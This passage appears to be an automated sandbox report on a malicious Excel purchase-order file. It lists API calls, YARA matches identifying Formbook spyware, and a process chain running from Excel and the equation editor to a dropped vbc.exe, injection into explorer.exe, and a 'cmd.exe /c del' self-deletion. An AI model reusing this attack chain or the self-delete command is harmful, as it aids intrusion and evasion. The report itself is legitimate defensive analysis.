          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182AA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A00078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A007AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A010D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A00060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A001D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A01148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FF8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A01930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FF938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A00C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A01D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001067C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001067C2 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028E1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028DFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009816A NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000981AB NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000982AA NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000982DF NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009838A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00210560
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002121D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0021366A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002163C4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0021D410
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00210D0A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00214DE8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0021AB7D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B94C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C277
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BCB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C573
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CDEF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B71F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A8D06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A13040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A2905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AB1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AB63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A363DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A12305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A17353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A45485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A21489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A905E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A2C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A56540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A14680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AB2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A457C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AAF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A8F8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A129B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AB098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A269FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A95955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AC3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00ABCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A96BCB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A37B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AAFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A42E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A2EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00AACFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A82FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A20F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001067C7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00105062
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001008F9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00100902
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001032FF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00103302
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00101362
          Source: C:\Users\Public\vbc.exeCode function: 5_2_001075B2
          Source: C:\Windows\explorer.exeCode function: 6_2_0296D2FF
          Source: C:\Windows\explorer.exeCode function: 6_2_0296A8F9
          Source: C:\Windows\explorer.exeCode function: 6_2_0296F062
          Source: C:\Windows\explorer.exeCode function: 6_2_029715B2
          Source: C:\Windows\explorer.exeCode function: 6_2_029707C7
          Source: C:\Windows\explorer.exeCode function: 6_2_0296A902
          Source: C:\Windows\explorer.exeCode function: 6_2_0296D302
          Source: C:\Windows\explorer.exeCode function: 6_2_0296B362
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028EE2E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02991238
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_029963BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028EF3CF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_029163DB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F2305
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F7353
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0293A37B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028EE0C6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0291D005
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0290905A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F3040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0296D06D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F4680
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028FE6C1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0293A634
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02992622
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0297579A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028FC7BC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_029257C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02925485
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02901489
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0297443E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0292D47D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0290C5F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F351F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02936540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_029A3A83
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0299CBA4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0297DBDA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028EFBD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02917B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0298F8EE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028FC85C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0291286D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0299098E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F29B2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_029069FE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02975955
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0297394B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02922E2F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0290EE4C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0298CFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02962FDC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02900F3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0291DF7C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0298FDDD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02920D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028FCD5B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009C277
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009C573
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00088C4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00088C50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00082FB0
          Source: EME_PO.47563.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 028EDF5C appears 121 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0295F970 appears 84 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02933F92 appears 132 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0293373B appears 245 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 028EE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A0DF5C appears 123 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A7F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A53F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A5373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A0E2A8 appears 38 times
          Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@9/6@13/8
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$EME_PO.47563.xlsxJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\CEkWcAdOJKRjisuKnvQHyyvhQA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmpJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: EME_PO.47563.xlsxReversingLabs: Detection: 37%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
